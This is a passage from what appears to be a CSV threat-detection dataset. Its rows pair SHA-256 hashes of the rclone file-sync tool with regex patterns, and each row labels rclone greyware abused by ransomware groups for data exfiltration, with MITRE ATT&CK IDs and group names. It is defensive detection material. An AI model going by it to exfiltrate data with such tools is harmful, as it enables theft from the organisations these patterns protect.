T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1dce9f399e4ac4a1deebc00de3dc11e880a5299ab933df9a4b9d7ce3aeffb20d*",".{0,1000}1dce9f399e4ac4a1deebc00de3dc11e880a5299ab933df9a4b9d7ce3aeffb20d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1df9cc0aac82013ab4387860bc1059df19f585868fdcc73f1a7bae3b5cc5c78b*",".{0,1000}1df9cc0aac82013ab4387860bc1059df19f585868fdcc73f1a7bae3b5cc5c78b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1e65d6a9229388b032dc9691eb041c922e133a1a6f35b9665dfd0457273da334*",".{0,1000}1e65d6a9229388b032dc9691eb041c922e133a1a6f35b9665dfd0457273da334.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1e974e0245f99c767e45bfc1568a8451a044beb70b8c4cdf4845467395943856*",".{0,1000}1e974e0245f99c767e45bfc1568a8451a044beb70b8c4cdf4845467395943856.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1ed2f132aaeb3c4d7422ff41944a9e8fecfbf0efcd2cdd58356dc80181a9745e*",".{0,1000}1ed2f132aaeb3c4d7422ff41944a9e8fecfbf0efcd2cdd58356dc80181a9745e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1f180d755994e8a501463d1255c019376b13720e9b970f3da5d08007335726c0*",".{0,1000}1f180d755994e8a501463d1255c019376b13720e9b970f3da5d08007335726c0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1f4453ac0f49d134dfa05b10ea4e3aa159c7fad7f8639a707c0678c04309d54b*",".{0,1000}1f4453ac0f49d134dfa05b10ea4e3aa159c7fad7f8639a707c0678c04309d54b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1f6b524a6a041b1fd96e570530c629756a886033ce50cd336b7eab1cea955019*",".{0,1000}1f6b524a6a041b1fd96e570530c629756a886033ce50cd336b7eab1cea955019.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1fa94229b3c6f5c9a7eb56af8e57e2e47b654770934976115dd918d50487a1e1*",".{0,1000}1fa94229b3c6f5c9a7eb56af8e57e2e47b654770934976115dd918d50487a1e1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1fb29637f484c581618b37fd321d3664fe52602d5c9bfef9d2c3acee8a5afdae*",".{0,1000}1fb29637f484c581618b37fd321d3664fe52602d5c9bfef9d2c3acee8a5afdae.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*20354177c2ba7a7695f6a97a645b22834ee4e0a530717e9b787886d4f61fc291*",".{0,1000}20354177c2ba7a7695f6a97a645b22834ee4e0a530717e9b787886d4f61fc291.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*2133a91f7cc4d3d456727a8004db0268c2dc8cc373886124e89d8bd743a18843*",".{0,1000}2133a91f7cc4d3d456727a8004db0268c2dc8cc373886124e89d8bd743a18843.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*2145cc53cfb47b26f038302b3e3a9125da9bc728f365abb4ba59dc463ab4f579*",".{0,1000}2145cc53cfb47b26f038302b3e3a9125da9bc728f365abb4ba59dc463ab4f579.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*2155ea2c225272a6f78b2aa4547bb587c40b007586e73b41b31c59edba64f8fe*",".{0,1000}2155ea2c225272a6f78b2aa4547bb587c40b007586e73b41b31c59edba64f8fe.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*2166a2076b45e113e1a90de8fe376491186847680eeea1f1c83a5743607ead26*",".{0,1000}2166a2076b45e113e1a90de8fe376491186847680eeea1f1c83a5743607ead26.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*223931256f38c5faffe9402892e379b47f9442189325dc35a8a58f83ac2d4d90*",".{0,1000}223931256f38c5faffe9402892e379b47f9442189325dc35a8a58f83ac2d4d90.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*2249bab380b8772c79a3f47caf4f0538e11c8e10acdc13c5292033fc403b10e9*",".{0,1000}2249bab380b8772c79a3f47caf4f0538e11c8e10acdc13c5292033fc403b10e9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*2261b96a6bd64788c498d0cd1e6a327f169a0092972dd3bbbb2ff2251ab78252*",".{0,1000}2261b96a6bd64788c498d0cd1e6a327f169a0092972dd3bbbb2ff2251ab78252.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*22bc4b6ddd64fa969a6181db315429b46f528f88152d90ae4f27efc46791cad7*",".{0,1000}22bc4b6ddd64fa969a6181db315429b46f528f88152d90ae4f27efc46791cad7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*22dec13f1013b2da0ec52eefe16d35ab027a29ea82c596154714c331ef01453f*",".{0,1000}22dec13f1013b2da0ec52eefe16d35ab027a29ea82c596154714c331ef01453f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*2330295df8b6f96d0a7e962c7b4779f9e5b52bd9b99b289aa1395aaf96e8ae5a*",".{0,1000}2330295df8b6f96d0a7e962c7b4779f9e5b52bd9b99b289aa1395aaf96e8ae5a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*23c1ff369e0adee0fa061ef44e5c75ff137e859ccba280354283016faa469e3f*",".{0,1000}23c1ff369e0adee0fa061ef44e5c75ff137e859ccba280354283016faa469e3f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*23ce78bdc640ea91a0a6c48688a41bfad3c3b62f85ecdd83cab3680c66b16853*",".{0,1000}23ce78bdc640ea91a0a6c48688a41bfad3c3b62f85ecdd83cab3680c66b16853.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*247a566f09408932d929191a08f7ab02efa583f92834823336ac9983c727026a*",".{0,1000}247a566f09408932d929191a08f7ab02efa583f92834823336ac9983c727026a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*24affae5bf7188361d794c1a44445d719c3b7a511d69ba1e29f6cf7c97850030*",".{0,1000}24affae5bf7188361d794c1a44445d719c3b7a511d69ba1e29f6cf7c97850030.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*24c4dba637f3db20f8975eb696064b95f1f2689aab8b7849b51d2544e3b81c5c*",".{0,1000}24c4dba637f3db20f8975eb696064b95f1f2689aab8b7849b51d2544e3b81c5c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*24cde0c118655d52ebccd55ad7656a24fc346b6a05d3914ab116235b5726ca5f*",".{0,1000}24cde0c118655d52ebccd55ad7656a24fc346b6a05d3914ab116235b5726ca5f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*24edac89937dfd5f8c945fe93d491505868d26280d2c70f8c071279b12174123*",".{0,1000}24edac89937dfd5f8c945fe93d491505868d26280d2c70f8c071279b12174123.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*2501494de128471883b5cab25a9ae6a292c118d0fee725dd853d8c1335411781*",".{0,1000}2501494de128471883b5cab25a9ae6a292c118d0fee725dd853d8c1335411781.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*252ac98bb095787764fb981b61eb453c13717e7b2fc1e6275fdfacdc9ff1cbf2*",".{0,1000}252ac98bb095787764fb981b61eb453c13717e7b2fc1e6275fdfacdc9ff1cbf2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*2547c89d62cac68c8dd271cf1d2e41b1d20a9ade7e25586a28a282444724a249*",".{0,1000}2547c89d62cac68c8dd271cf1d2e41b1d20a9ade7e25586a28a282444724a249.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*254d1221d682772e110fac89f96958aa8c8fe830474a672b84048ce1339f8620*",".{0,1000}254d1221d682772e110fac89f96958aa8c8fe830474a672b84048ce1339f8620.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*2574d320cc107047490a5e3432c84c4de4b0d9da70f6d4aaa48a80a40b99bc99*",".{0,1000}2574d320cc107047490a5e3432c84c4de4b0d9da70f6d4aaa48a80a40b99bc99.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*258b3c1b649e03f58d2c099031014ab8bbef7e3af7bc63cdf3d20d0085025a6d*",".{0,1000}258b3c1b649e03f58d2c099031014ab8bbef7e3af7bc63cdf3d20d0085025a6d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*25da7fc5c9269b3897f27b0d946919df595c6dda1b127085fda0fe32aa59d29d*",".{0,1000}25da7fc5c9269b3897f27b0d946919df595c6dda1b127085fda0fe32aa59d29d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*2601f8004cb6dda784d4f70fdf9c00d65172640199599416ae266c2977095c2c*",".{0,1000}2601f8004cb6dda784d4f70fdf9c00d65172640199599416ae266c2977095c2c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
